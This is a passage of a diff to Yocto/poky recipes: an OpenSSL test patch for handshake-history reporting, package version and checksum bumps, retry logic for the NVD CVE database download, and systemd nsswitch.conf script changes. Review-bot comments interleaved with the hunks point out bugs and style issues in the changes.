+- RENEG_APPLICATION_DATA,
+- RENEG_SETUP,
+- RENEG_HANDSHAKE,
+- APPLICATION_DATA,
+- SHUTDOWN,
+- CONNECTION_DONE
+-} connect_phase_t;
+-
+-
+ static int renegotiate_op(const SSL_TEST_CTX *test_ctx)
+ {
+ switch (test_ctx->handshake_mode) {
+@@ -1162,19 +1238,6 @@ static void do_connect_step(const SSL_TEST_CTX *test_ctx, PEER *peer,
+ }
+ }
+
+-typedef enum {
+- /* Both parties succeeded. */
+- HANDSHAKE_SUCCESS,
+- /* Client errored. */
+- CLIENT_ERROR,
+- /* Server errored. */
+- SERVER_ERROR,
+- /* Peers are in inconsistent state. */
+- INTERNAL_ERROR,
+- /* One or both peers not done. */
+- HANDSHAKE_RETRY
+-} handshake_status_t;
+-
+ /*
+ * Determine the handshake outcome.
+ * last_status: the status of the peer to have acted last.
+@@ -1539,6 +1602,10 @@ static HANDSHAKE_RESULT *do_handshake_internal(
+
+ start = time(NULL);
+
++ save_loop_history(&(ret->history),
++ phase, status, server.status, client.status,
++ client_turn_count, client_turn);
++
+ /*
+ * Half-duplex handshake loop.
+ * Client and server speak to each other synchronously in the same process.
+@@ -1560,6 +1627,10 @@ static HANDSHAKE_RESULT *do_handshake_internal(
+ 0 /* server went last */);
+ }
+
++ save_loop_history(&(ret->history),
++ phase, status, server.status, client.status,
++ client_turn_count, client_turn);
++
+ switch (status) {
+ case HANDSHAKE_SUCCESS:
+ client_turn_count = 0;
+diff --git a/test/helpers/handshake.h b/test/helpers/handshake.h
+index 78b03f9f4b..b9967c2623 100644
+--- a/test/helpers/handshake.h
++++ b/test/helpers/handshake.h
+@@ -1,5 +1,5 @@
+ /*
+- * Copyright 2016-2021 The OpenSSL Project Authors. All Rights Reserved.
++ * Copyright 2016-2023 The OpenSSL Project Authors. All Rights Reserved.
+ *
+ * Licensed under the Apache License 2.0 (the "License"). You may not use
+ * this file except in compliance with the License. You can obtain a copy
+@@ -12,6 +12,11 @@
+
+ #include "ssl_test_ctx.h"
+
++#define MAX_HANDSHAKE_HISTORY_ENTRY_BIT 4
++#define MAX_HANDSHAKE_HISTORY_ENTRY (1 << MAX_HANDSHAKE_HISTORY_ENTRY_BIT)
++#define MAX_HANDSHAKE_HISTORY_ENTRY_IDX_MASK \
++ ((1 << MAX_HANDSHAKE_HISTORY_ENTRY_BIT) - 1)
++
+ typedef struct ctx_data_st {
+ unsigned char *npn_protocols;
+ size_t npn_protocols_len;
+@@ -22,6 +27,63 @@ typedef struct ctx_data_st {
+ char *session_ticket_app_data;
+ } CTX_DATA;
+
++typedef enum {
++ HANDSHAKE,
++ RENEG_APPLICATION_DATA,
++ RENEG_SETUP,
++ RENEG_HANDSHAKE,
++ APPLICATION_DATA,
++ SHUTDOWN,
++ CONNECTION_DONE
++} connect_phase_t;
++
++/* The status for each connection phase. */
++typedef enum {
++ PEER_SUCCESS,
++ PEER_RETRY,
++ PEER_ERROR,
++ PEER_WAITING,
++ PEER_TEST_FAILURE
++} peer_status_t;
++
++typedef enum {
++ /* Both parties succeeded. */
++ HANDSHAKE_SUCCESS,
++ /* Client errored. */
++ CLIENT_ERROR,
++ /* Server errored. */
++ SERVER_ERROR,
++ /* Peers are in inconsistent state. */
++ INTERNAL_ERROR,
++ /* One or both peers not done. */
++ HANDSHAKE_RETRY
++} handshake_status_t;
++
++/* Stores the various status information in a handshake loop. */
++typedef struct handshake_history_entry_st {
++ connect_phase_t phase;
++ handshake_status_t handshake_status;
++ peer_status_t server_status;
++ peer_status_t client_status;
++ int client_turn_count;
++ int is_client_turn;
++} HANDSHAKE_HISTORY_ENTRY;
++
++typedef struct handshake_history_st {
++ /* Implemented using ring buffer. */
++ /*
++ * The valid entries are |entries[last_idx]|, |entries[last_idx-1]|,
++ * ..., etc., going up to |entry_count| number of entries. Note that when
++ * the index into the array |entries| becomes < 0, we wrap around to
++ * the end of |entries|.
++ */
++ HANDSHAKE_HISTORY_ENTRY entries[MAX_HANDSHAKE_HISTORY_ENTRY];
++ /* The number of valid entries in |entries| array. */
++ size_t entry_count;
++ /* The index of the last valid entry in the |entries| array. */
++ size_t last_idx;
++} HANDSHAKE_HISTORY;
++
+ typedef struct handshake_result {
+ ssl_test_result_t result;
+ /* These alerts are in the 2-byte format returned by the info_callback. */
+@@ -77,6 +139,8 @@ typedef struct handshake_result {
+ char *cipher;
+ /* session ticket application data */
+ char *result_session_ticket_app_data;
++ /* handshake loop history */
++ HANDSHAKE_HISTORY history;
+ } HANDSHAKE_RESULT;
+
+ HANDSHAKE_RESULT *HANDSHAKE_RESULT_new(void);
+@@ -95,4 +159,8 @@ int configure_handshake_ctx_for_srp(SSL_CTX *server_ctx, SSL_CTX *server2_ctx,
+ CTX_DATA *server2_ctx_data,
+ CTX_DATA *client_ctx_data);
+
++const char *handshake_connect_phase_name(connect_phase_t phase);
++const char *handshake_status_name(handshake_status_t handshake_status);
++const char *handshake_peer_status_name(peer_status_t peer_status);
++
+ #endif /* OSSL_TEST_HANDSHAKE_HELPER_H */
+diff --git a/test/ssl_test.c b/test/ssl_test.c
+index ea608518f9..9d6b093c81 100644
+--- a/test/ssl_test.c
++++ b/test/ssl_test.c
+@@ -26,6 +26,44 @@ static OSSL_LIB_CTX *libctx = NULL;
+ /* Currently the section names are of the form test-<number>, e.g. test-15. */
+ #define MAX_TESTCASE_NAME_LENGTH 100
+
++static void print_handshake_history(const HANDSHAKE_HISTORY *history)
++{
++ size_t first_idx;
++ size_t i;
++ size_t cur_idx;
++ const HANDSHAKE_HISTORY_ENTRY *cur_entry;
++ const char header_template[] = "|%14s|%16s|%16s|%16s|%17s|%14s|";
++ const char body_template[] = "|%14s|%16s|%16s|%16s|%17d|%14s|";
++
++ TEST_info("The following is the server/client state "
++ "in the most recent %d handshake loops.",
++ MAX_HANDSHAKE_HISTORY_ENTRY);
++
++ TEST_note("=================================================="
++ "==================================================");
++ TEST_note(header_template,
++ "phase", "handshake status", "server status",
++ "client status", "client turn count", "is client turn");
++ TEST_note("+--------------+----------------+----------------"
++ "+----------------+-----------------+--------------+");
++
++ first_idx = (history->last_idx - history->entry_count + 1) &
++ MAX_HANDSHAKE_HISTORY_ENTRY_IDX_MASK;
++ for (i = 0; i < history->entry_count; ++i) {
++ cur_idx = (first_idx + i) & MAX_HANDSHAKE_HISTORY_ENTRY_IDX_MASK;
++ cur_entry = &(history->entries)[cur_idx];
++ TEST_note(body_template,
++ handshake_connect_phase_name(cur_entry->phase),
++ handshake_status_name(cur_entry->handshake_status),
++ handshake_peer_status_name(cur_entry->server_status),
++ handshake_peer_status_name(cur_entry->client_status),
++ cur_entry->client_turn_count,
++ cur_entry->is_client_turn ? "true" : "false");
++ }
++ TEST_note("=================================================="
++ "==================================================");
++}
++
+ static const char *print_alert(int alert)
+ {
+ return alert ? SSL_alert_desc_string_long(alert) : "no alert";
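Review bot: The TEST_info() banner in print_handshake_history() always reports MAX_HANDSHAKE_HISTORY_ENTRY loops, even when history->entry_count is smaller, so a short handshake is announced as 16 rows and then prints fewer. Either print history->entry_count or word the message as "up to %d". The first_idx calculation also depends on size_t wrap-around being masked off, which is only correct because the buffer size is a power of two; a short comment next to the expression would make that constraint explicit for anyone who later changes MAX_HANDSHAKE_HISTORY_ENTRY_BIT.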
+@@ -388,6 +426,12 @@ static int check_test(HANDSHAKE_RESULT *result, SSL_TEST_CTX *test_ctx)
+ ret &= check_client_sign_type(result, test_ctx);
+ ret &= check_client_ca_names(result, test_ctx);
+ }
++
++ /* Print handshake loop history if any check fails. */
++ if (!ret) {
++ print_handshake_history(&(result->history));
++ }
++
+ return ret;
+ }
+
+--
+2.25.1
+
diff --git a/poky/meta/recipes-connectivity/openssl/openssl_3.1.4.bb b/poky/meta/recipes-connectivity/openssl/openssl_3.1.4.bb
index b1d5d8766f..0fe4e76808 100644
--- a/poky/meta/recipes-connectivity/openssl/openssl_3.1.4.bb
+++ b/poky/meta/recipes-connectivity/openssl/openssl_3.1.4.bb
@@ -12,6 +12,7 @@ SRC_URI = "http://www.openssl.org/source/openssl-${PV}.tar.gz \
file://0001-buildinfo-strip-sysroot-and-debug-prefix-map-from-co.patch \
file://0001-Configure-do-not-tweak-mips-cflags.patch \
file://fix_random_labels.patch \
+ file://0001-Added-handshake-history-reporting-when-test-fails.patch \
"
SRC_URI:append:class-nativesdk = " \
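Review bot: The new SRC_URI entry carries a patch that only touches test/helpers/handshake.c, test/helpers/handshake.h and test/ssl_test.c and is marked Upstream-Status: Submitted, yet the patch header gives no reason why the recipe needs it. Please add a sentence to the patch description saying what failure it is meant to help diagnose, so it can be dropped once the upstream pull request is resolved or the failure is understood.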
diff --git a/poky/meta/recipes-core/base-passwd/base-passwd/0006-Make-it-possible-to-configure-whether-to-use-SELinux.patch b/poky/meta/recipes-core/base-passwd/base-passwd/0006-Make-it-possible-to-configure-whether-to-use-SELinux.patch
deleted file mode 100644
index 2cc6174e2a..0000000000
--- a/poky/meta/recipes-core/base-passwd/base-passwd/0006-Make-it-possible-to-configure-whether-to-use-SELinux.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 25e3bf09bbbb04aa930ea0fd9f28809a24fb7194 Mon Sep 17 00:00:00 2001
-From: Peter Kjellerstedt <pkj@axis.com>
-Date: Sun, 2 Oct 2022 17:47:29 +0200
-Subject: [PATCH] Make it possible to configure whether to use SELinux or not
-
-Upstream-Status: Backport [https://salsa.debian.org/debian/base-passwd/-/commit/396c41bb35e03c5dcc727aa9f74218a45874ac1f]
-Signed-off-by: Peter Kjellerstedt <peter.kjellerstedt@axis.com>
----
- configure.ac | 13 ++++++++++++-
- 1 file changed, 12 insertions(+), 1 deletion(-)
-
-diff --git a/configure.ac b/configure.ac
-index 589df88..e46403b 100644
---- a/configure.ac
-+++ b/configure.ac
-@@ -13,7 +13,18 @@ AC_SYS_LARGEFILE
-
- dnl Scan for things we need
- AC_CHECK_FUNCS([putgrent])
--AC_CHECK_LIB([selinux], [is_selinux_enabled])
-+
-+dnl Check for SELinux
-+AC_MSG_CHECKING([whether to enable SELinux support])
-+AC_ARG_ENABLE([selinux],
-+ [AS_HELP_STRING([--disable-selinux], [disable support for SELinux])],
-+ [],
-+ [enable_selinux=yes])
-+AC_MSG_RESULT($enable_selinux)
-+AS_IF([test "x$enable_selinux" != xno],
-+ [AC_CHECK_LIB([selinux], [is_selinux_enabled], [],
-+ [AC_MSG_ERROR(
-+ [SELinux support not available (use --disable-selinux to disable)])])])
-
- dnl Check for debconf
- AC_MSG_CHECKING([whether to enable debconf support])
diff --git a/poky/meta/recipes-core/base-passwd/base-passwd_3.6.1.bb b/poky/meta/recipes-core/base-passwd/base-passwd_3.6.2.bb
index 44bcfb0199..bb4b49e6ab 100644
--- a/poky/meta/recipes-core/base-passwd/base-passwd_3.6.1.bb
+++ b/poky/meta/recipes-core/base-passwd/base-passwd_3.6.2.bb
@@ -11,12 +11,11 @@ SRC_URI = "https://launchpad.net/debian/+archive/primary/+files/${BPN}_${PV}.tar
file://0003-Remove-for-root-since-we-do-not-have-an-etc-shadow.patch \
file://0004-Add-an-input-group-for-the-dev-input-devices.patch \
file://0005-Add-kvm-group.patch \
- file://0006-Make-it-possible-to-configure-whether-to-use-SELinux.patch \
file://0007-Add-wheel-group.patch \
file://0001-base-passwd-Add-the-sgx-group.patch \
"
-SRC_URI[sha256sum] = "6ff369be59d586ba63c0c5fcb00f75f9953fe49db88bc6c6428f2c92866f79af"
+SRC_URI[sha256sum] = "06dc78352bf38a8df76ff295e15ab5654cdefe41e62368b15bfcbbab8e4ec2a0"
# the package is taken from launchpad; that source is static and goes stale
# so we check the latest upstream from a directory that does get updated
diff --git a/poky/meta/recipes-core/ell/ell_0.59.bb b/poky/meta/recipes-core/ell/ell_0.60.bb
index 0483dbe582..4e414f3b90 100644
--- a/poky/meta/recipes-core/ell/ell_0.59.bb
+++ b/poky/meta/recipes-core/ell/ell_0.60.bb
@@ -15,7 +15,7 @@ DEPENDS = "dbus"
inherit autotools pkgconfig
SRC_URI = "https://mirrors.edge.kernel.org/pub/linux/libs/${BPN}/${BPN}-${PV}.tar.xz"
-SRC_URI[sha256sum] = "370dc2b7c73cd57856017180a2a70a15ca1b0183bfd453b3cffe2d707c37da3d"
+SRC_URI[sha256sum] = "61cec2df694b548e51afa3e7ffd1e1ad31a9fea7bedb93a3a3cc60894390c70f"
do_configure:prepend () {
mkdir -p ${S}/build-aux
diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0_2.78.0.bb b/poky/meta/recipes-core/glib-2.0/glib-2.0_2.78.1.bb
index 500e4e873e..a490262112 100644
--- a/poky/meta/recipes-core/glib-2.0/glib-2.0_2.78.0.bb
+++ b/poky/meta/recipes-core/glib-2.0/glib-2.0_2.78.1.bb
@@ -19,7 +19,7 @@ SRC_URI:append:class-native = " file://relocate-modules.patch \
file://0001-meson.build-do-not-enable-pidfd-features-on-native-g.patch \
"
-SRC_URI[sha256sum] = "44eaab8b720877ce303c5540b657b126f12dc94972d9880b52959f43fb537b30"
+SRC_URI[sha256sum] = "915bc3d0f8507d650ead3832e2f8fb670fce59aac4d7754a7dab6f1e6fed78b2"
# Find any meson cross files in FILESPATH that are relevant for the current
# build (using siteinfo) and add them to EXTRA_OEMESON.
diff --git a/poky/meta/recipes-core/glibc/glibc-version.inc b/poky/meta/recipes-core/glibc/glibc-version.inc
index 19b98bc11a..0ef4289557 100644
--- a/poky/meta/recipes-core/glibc/glibc-version.inc
+++ b/poky/meta/recipes-core/glibc/glibc-version.inc
@@ -1,6 +1,6 @@
SRCBRANCH ?= "release/2.38/master"
PV = "2.38+git"
-SRCREV_glibc ?= "750a45a783906a19591fb8ff6b7841470f1f5701"
+SRCREV_glibc ?= "44f757a6364a546359809d48c76b3debd26e77d4"
SRCREV_localedef ?= "e0eca29583b9e0f62645c4316ced93cf4e4e26e1"
GLIBC_GIT_URI ?= "git://sourceware.org/git/glibc.git;protocol=https"
diff --git a/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb b/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb
index 2b164afc99..3a049b8e37 100644
--- a/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb
+++ b/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb
@@ -26,7 +26,7 @@ inherit core-image setuptools3 features_check
REQUIRED_DISTRO_FEATURES += "xattr"
-SRCREV ?= "3bcf525a688a9989ac37394f44a831d54b01ba14"
+SRCREV ?= "59e8c565ef9cddb4cab90017d187368aa34f361b"
SRC_URI = "git://git.yoctoproject.org/poky;branch=nanbield \
file://Yocto_Build_Appliance.vmx \
file://Yocto_Build_Appliance.vmxf \
diff --git a/poky/meta/recipes-core/meta/cve-update-nvd2-native.bb b/poky/meta/recipes-core/meta/cve-update-nvd2-native.bb
index d0321f1bb5..bfe48b27e7 100644
--- a/poky/meta/recipes-core/meta/cve-update-nvd2-native.bb
+++ b/poky/meta/recipes-core/meta/cve-update-nvd2-native.bb
@@ -26,8 +26,8 @@ NVDCVE_API_KEY ?= ""
# Use a negative value to skip the update
CVE_DB_UPDATE_INTERVAL ?= "86400"
-# Timeout for blocking socket operations, such as the connection attempt.
-CVE_SOCKET_TIMEOUT ?= "60"
+# Number of attmepts for each http query to nvd server before giving up
+CVE_DB_UPDATE_ATTEMPTS ?= "5"
CVE_DB_TEMP_FILE ?= "${CVE_CHECK_DB_DIR}/temp_nvdcve_2.db"
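Review bot: CVE_SOCKET_TIMEOUT is removed here rather than deprecated, so any local.conf that still sets it is silently ignored, and the urlopen(request) call in nvd_request_next passes no timeout argument. Please confirm that a stalled connection to the NVD server is still bounded somewhere, otherwise the new attempt counter never gets a chance to advance. The replacement comment also has a typo: "attmepts" should be "attempts".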
@@ -114,7 +114,10 @@ def cleanup_db_download(db_file, db_tmp_file):
if os.path.exists(db_tmp_file):
os.remove(db_tmp_file)
-def nvd_request_next(url, api_key, args):
+def nvd_request_wait(attempt, min_wait):
+ return min ( ( (2 * attempt) + min_wait ) , 30)
+
+def nvd_request_next(url, attempts, api_key, args, min_wait):
"""
Request next part of the NVD dabase
"""
@@ -130,7 +133,7 @@ def nvd_request_next(url, api_key, args):
request.add_header("apiKey", api_key)
bb.note("Requesting %s" % request.full_url)
- for attempt in range(5):
+ for attempt in range(attempts):
try:
r = urllib.request.urlopen(request)
@@ -143,8 +146,10 @@ def nvd_request_next(url, api_key, args):
r.close()
except Exception as e:
- bb.note("CVE database: received error (%s), retrying" % (e))
- time.sleep(6)
+ wait_time = nvd_request_wait(attempt, min_wait)
+ bb.note("CVE database: received error (%s)" % (e))
+ bb.note("CVE database: retrying download after %d seconds. attempted (%d/%d)" % (wait_time, attempt+1, attempts))
+ time.sleep(wait_time)
pass
else:
return raw_data
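Review bot: In the except branch the code logs "retrying download" and sleeps for wait_time even when attempt+1 equals attempts, so the final failure costs up to 30 more seconds and prints a misleading message before the function gives up. Skip the sleep and log a give-up message on the last iteration. The trailing `pass` after time.sleep() is redundant, and catching bare Exception means a programming error in the loop body is retried the same way as a network error.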
@@ -186,10 +191,16 @@ def update_db_file(db_tmp_file, d, database_time):
index = 0
url = d.getVar("NVDCVE_URL")
api_key = d.getVar("NVDCVE_API_KEY") or None
+ attempts = int(d.getVar("CVE_DB_UPDATE_ATTEMPTS"))
+
+ # Recommended by NVD
+ wait_time = 6
+ if api_key:
+ wait_time = 2
while True:
req_args['startIndex'] = index
- raw_data = nvd_request_next(url, api_key, req_args)
+ raw_data = nvd_request_next(url, attempts, api_key, req_args, wait_time)
if raw_data is None:
# We haven't managed to download data
return False
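Review bot: `int(d.getVar("CVE_DB_UPDATE_ATTEMPTS"))` is used without validation: a non-numeric value raises ValueError inside the task, and a value of 0 or below makes `range(attempts)` in nvd_request_next iterate zero times, so no request is ever sent and the update is reported as a download failure. Suggest checking the value after conversion and failing with a clear message, or clamping it to at least 1. The "Recommended by NVD" comment now covers both the 6 second and the 2 second delay; it would help to say which delay applies with an API key and which without.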
@@ -209,7 +220,7 @@ def update_db_file(db_tmp_file, d, database_time):
break
# Recommended by NVD
- time.sleep(6)
+ time.sleep(wait_time)
# Update success, set the date to cve_check file.
cve_f.write('CVE database update : %s\n\n' % datetime.date.today())
diff --git a/poky/meta/recipes-core/systemd/systemd-boot_254.4.bb b/poky/meta/recipes-core/systemd/systemd-boot_254.4.bb
index 4ee25ee72f..2b43ccf243 100644
--- a/poky/meta/recipes-core/systemd/systemd-boot_254.4.bb
+++ b/poky/meta/recipes-core/systemd/systemd-boot_254.4.bb
@@ -8,6 +8,10 @@ DEPENDS = "intltool-native libcap util-linux gperf-native python3-jinja2-native
inherit meson pkgconfig gettext
inherit deploy
+SRC_URI += " \
+ file://0030-meson-Pass-all-static-pie-args-to-linker.patch \
+ "
+
LDFLAGS:prepend = "${@ " ".join(d.getVar('LD').split()[1:])} "
EFI_LD = "bfd"
diff --git a/poky/meta/recipes-core/systemd/systemd-compat-units.bb b/poky/meta/recipes-core/systemd/systemd-compat-units.bb
index 253bc9fcf1..c03d97f9c9 100644
--- a/poky/meta/recipes-core/systemd/systemd-compat-units.bb
+++ b/poky/meta/recipes-core/systemd/systemd-compat-units.bb
@@ -27,7 +27,8 @@ SYSTEMD_DISABLED_SYSV_SERVICES = " \
pkg_postinst:${PN} () {
- cd $D${sysconfdir}/init.d || exit 0
+ test -d $D${sysconfdir}/init.d || exit 0
+ cd $D${sysconfdir}/init.d
echo "Disabling the following sysv scripts: "
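Review bot: After the new `test -d` guard, the `cd $D${sysconfdir}/init.d` line has no failure handling of its own and the path is unquoted in both lines. If the directory exists but cannot be entered, the commands that follow run from whatever directory the postinst started in, unless the script is executed with errexit. Suggest `cd "$D${sysconfdir}/init.d" || exit 1` and quoting the `test -d` argument the same way.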
diff --git a/poky/meta/recipes-core/systemd/systemd.inc b/poky/meta/recipes-core/systemd/systemd.inc
index 3ba0b5ffc5..ccc3236457 100644
--- a/poky/meta/recipes-core/systemd/systemd.inc
+++ b/poky/meta/recipes-core/systemd/systemd.inc
@@ -10,7 +10,8 @@ state, maintains mount and automount points and implements an \
elaborate transactional dependency-based service control logic. It can \
work as a drop-in replacement for sysvinit."
-LICENSE = "GPL-2.0-only & LGPL-2.1-only"
+LICENSE = "GPL-2.0-only & LGPL-2.1-or-later"
+LICENSE:libsystemd = "LGPL-2.1-or-later"
LIC_FILES_CHKSUM = "file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe \
file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c"
diff --git a/poky/meta/recipes-core/systemd/systemd/0030-meson-Pass-all-static-pie-args-to-linker.patch b/poky/meta/recipes-core/systemd/systemd/0030-meson-Pass-all-static-pie-args-to-linker.patch
new file mode 100644
index 0000000000..8e563238ef
--- /dev/null
+++ b/poky/meta/recipes-core/systemd/systemd/0030-meson-Pass-all-static-pie-args-to-linker.patch
@@ -0,0 +1,35 @@
+From f85a387a67900b02c69abccb88c2ef7191c67277 Mon Sep 17 00:00:00 2001
+From: Jan Janssen <medhefgo@web.de>
+Date: Sun, 1 Oct 2023 09:55:48 +0200
+Subject: [PATCH] meson: Pass all -static-pie args to linker
+
+Fixes: #29381
+
+Upstream-Status: Backport [https://github.com/systemd/systemd/commit/cecbb162a3134b43d2ca160e13198c73ff34c3ef]
+Signed-off-by: Viswanath Kraleti <quic_vkraleti@quicinc.com>
+---
+ src/boot/efi/meson.build | 11 ++++++++---
+ 1 file changed, 8 insertions(+), 3 deletions(-)
+
+diff --git a/src/boot/efi/meson.build b/src/boot/efi/meson.build
+index 2773eaf286..9a60a57329 100644
+--- a/src/boot/efi/meson.build
++++ b/src/boot/efi/meson.build
+@@ -161,9 +161,14 @@ efi_c_ld_args = [
+ '-Wl,--entry=efi_main',
+ '-Wl,--fatal-warnings',
+
+- # These flags should be passed by -static-pie, but seem to be missing sometimes.
+- '-Wl,--no-dynamic-linker',
+- '-z', 'text',
++ # These flags should be passed by -static-pie, but for whatever reason the flag translation
++ # is not enabled on all architectures. Not passing `-static` would just allow the linker to
++ # use dynamic libraries, (which we can't/don't use anyway). But if `-pie` is missing and the
++ # gcc build does not default to `-pie` we get a regular (no-pie) binary that will be
++ # rightfully rejected by elf2efi. Note that meson also passes `-pie` to the linker driver,
++ # but it is overridden by our `-static-pie`. We also need to pass these directly to the
++ # linker as `-static`+`-pie` seem to get translated differently.
++ '-Wl,-static,-pie,--no-dynamic-linker,-z,text',
+
+ # EFI has 4KiB pages.
+ '-z', 'common-page-size=4096',
diff --git a/poky/meta/recipes-core/systemd/systemd_254.4.bb b/poky/meta/recipes-core/systemd/systemd_254.4.bb
index 77724eb822..285ca92e68 100644
--- a/poky/meta/recipes-core/systemd/systemd_254.4.bb
+++ b/poky/meta/recipes-core/systemd/systemd_254.4.bb
@@ -178,7 +178,7 @@ PACKAGECONFIG[microhttpd] = "-Dmicrohttpd=true,-Dmicrohttpd=false,libmicrohttpd"
PACKAGECONFIG[myhostname] = "-Dnss-myhostname=true,-Dnss-myhostname=false,,libnss-myhostname"
PACKAGECONFIG[networkd] = "-Dnetworkd=true,-Dnetworkd=false"
PACKAGECONFIG[no-dns-fallback] = "-Ddns-servers="
-PACKAGECONFIG[nss] = "-Dnss-systemd=true,-Dnss-systemd=false"
+PACKAGECONFIG[nss] = "-Dnss-systemd=true,-Dnss-systemd=false,,libnss-systemd"
PACKAGECONFIG[nss-mymachines] = "-Dnss-mymachines=true,-Dnss-mymachines=false"
PACKAGECONFIG[nss-resolve] = "-Dnss-resolve=true,-Dnss-resolve=false"
PACKAGECONFIG[oomd] = "-Doomd=true,-Doomd=false"
@@ -826,15 +826,31 @@ ALTERNATIVE_LINK_NAME[runlevel] = "${base_sbindir}/runlevel"
ALTERNATIVE_PRIORITY[runlevel] ?= "300"
pkg_postinst:${PN}:libc-glibc () {
- sed -e '/^hosts:/s/\s*\<myhostname\>//' \
- -e 's/\(^hosts:.*\)\(\<files\>\)\(.*\)\(\<dns\>\)\(.*\)/\1\2 myhostname \3\4\5/' \
- -i $D${sysconfdir}/nsswitch.conf
+ if ${@bb.utils.contains('PACKAGECONFIG', 'myhostname', 'true', 'false', d)}; then
+ sed -e '/^hosts:/s/\s*\<myhostname\>//' \
+ -e 's/\(^hosts:.*\)\(\<files\>\)\(.*\)\(\<dns\>\)\(.*\)/\1\2 myhostname \3\4\5/' \
+ -i $D${sysconfdir}/nsswitch.conf
+ fi
+ if ${@bb.utils.contains('PACKAGECONFIG', 'nss', 'true', 'false', d)}; then
+ sed -e 's#\(^passwd:.*\)#\1 systemd#' \
+ -e 's#\(^group:.*\)#\1 systemd#' \
+ -e 's#\(^shadow:.*\)#\1 systemd#' \
+ -i $D${sysconfdir}/nsswitch.conf
+ fi
}
pkg_prerm:${PN}:libc-glibc () {
- sed -e '/^hosts:/s/\s*\<myhostname\>//' \
- -e '/^hosts:/s/\s*myhostname//' \
- -i $D${sysconfdir}/nsswitch.conf
+ if ${@bb.utils.contains('PACKAGECONFIG', 'myhostname', 'true', 'false', d)}; then
+ sed -e '/^hosts:/s/\s*\<myhostname\>//' \
+ -e '/^hosts:/s/\s*myhostname//' \
+ -i $D${sysconfdir}/nsswitch.conf
+ fi
+ if ${@bb.utils.contains('PACKAGECONFIG', 'nss', 'true', 'false', d)}; then
+ sed -e '/^passwd:/s#\s*systemd##' \
+ -e '/^group:/s#\s*systemd##' \
+ -e '/^shadow:/s#\s*systemd##' \
+ -i $D${sysconfdir}/nsswitch.conf
+ fi
}
PACKAGE_WRITE_DEPS += "qemu-native"
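Review bot: The new nss branch of pkg_postinst appends " systemd" to the passwd, group and shadow lines without first removing an existing entry, unlike the myhostname branch, which strips the old token before re-adding it. Running the postinst a second time (for example on upgrade) leaves "systemd systemd" in nsswitch.conf. The matching prerm expressions use `\s*systemd` with no word boundaries, so they would also cut "systemd" out of a longer token on those lines. Suggest stripping with `\<systemd\>` in both scriptlets before appending. Since this changes the lookup order for account databases, it is also worth stating in the commit message that the module is intentionally placed last.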
diff --git a/poky/meta/recipes-devtools/binutils/binutils-2.41.inc b/poky/meta/recipes-devtools/binutils/binutils-2.41.inc
index b4934c02a8..d4b239258d 100644
--- a/poky/meta/recipes-devtools/binutils/binutils-2.41.inc
+++ b/poky/meta/recipes-devtools/binutils/binutils-2.41.inc
@@ -18,7 +18,7 @@ SRCBRANCH ?= "binutils-2_41-branch"
UPSTREAM_CHECK_GITTAGREGEX = "binutils-(?P<pver>\d+_(\d_?)*)"
-SRCREV ?= "cb4c3555ac4cf8aaf0935cb6e4b09e6882436d21"
+SRCREV ?= "e13f70c7fcb2f4a39ddad4ccb83660dbfee2caeb"
BINUTILS_GIT_URI ?= "git://sourceware.org/git/binutils-gdb.git;branch=${SRCBRANCH};protocol=https"
SRC_URI = "\
${BINUTILS_GIT_URI} \
diff --git a/poky/meta/recipes-devtools/cmake/cmake-native_3.27.5.bb b/poky/meta/recipes-devtools/cmake/cmake-native_3.27.7.bb
index 546d117156..546d117156 100644
--- a/poky/meta/recipes-devtools/cmake/cmake-native_3.27.5.bb
+++ b/poky/meta/recipes-devtools/cmake/cmake-native_3.27.7.bb
diff --git a/poky/meta/recipes-devtools/cmake/cmake.inc b/poky/meta/recipes-devtools/cmake/cmake.inc
index ef4eec5ab1..ecb0e487df 100644
--- a/poky/meta/recipes-devtools/cmake/cmake.inc
+++ b/poky/meta/recipes-devtools/cmake/cmake.inc
@@ -19,7 +19,7 @@ CMAKE_MAJOR_VERSION = "${@'.'.join(d.getVar('PV').split('.')[0:2])}"
SRC_URI = "https://cmake.org/files/v${CMAKE_MAJOR_VERSION}/cmake-${PV}.tar.gz \
"
-SRC_URI[sha256sum] = "5175e8fe1ca9b1dd09090130db7201968bcce1595971ff9e9998c2f0765004c9"
+SRC_URI[sha256sum] = "08f71a106036bf051f692760ef9558c0577c42ac39e96ba097e7662bd4158d8e"
UPSTREAM_CHECK_REGEX = "cmake-(?P<pver>\d+(\.\d+)+)\.tar"
diff --git a/poky/meta/recipes-devtools/cmake/cmake_3.27.5.bb b/poky/meta/recipes-devtools/cmake/cmake_3.27.7.bb
index 6a9a3266df..6a9a3266df 100644
--- a/poky/meta/recipes-devtools/cmake/cmake_3.27.5.bb
+++ b/poky/meta/recipes-devtools/cmake/cmake_3.27.7.bb
diff --git a/poky/meta/recipes-devtools/json-c/json-c_0.17.bb b/poky/meta/recipes-devtools/json-c/json-c_0.17.bb
index f4b7a32cea..20bcece768 100644
--- a/poky/meta/recipes-devtools/json-c/json-c_0.17.bb
+++ b/poky/meta/recipes-devtools/json-c/json-c_0.17.bb
@@ -17,6 +17,9 @@ UPSTREAM_CHECK_REGEX = "json-c-(?P<pver>\d+(\.\d+)+)-\d+"
RPROVIDES:${PN} = "libjson"
+# Required for ICECC builds
+EXTRA_OECMAKE = "-DDISABLE_WERROR=ON"
+
inherit cmake ptest
do_install_ptest() {
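Review bot: The comment says "-DDISABLE_WERROR=ON" is required for ICECC builds, but `EXTRA_OECMAKE = ...` applies it to every build and, being a plain assignment, discards anything set earlier. Use `EXTRA_OECMAKE += "-DDISABLE_WERROR=ON"` so it composes with other settings, and either make the comment say that warnings-as-errors are disabled unconditionally or restrict the flag to the ICECC case.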
diff --git a/poky/meta/recipes-devtools/log4cplus/log4cplus_2.1.0.bb b/poky/meta/recipes-devtools/log4cplus/log4cplus_2.1.1.bb
index e0c16d2e73..be3c787ab2 100644
--- a/poky/meta/recipes-devtools/log4cplus/log4cplus_2.1.0.bb
+++ b/poky/meta/recipes-devtools/log4cplus/log4cplus_2.1.1.bb
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=41e8e060c26822886b592ab4765c756b"
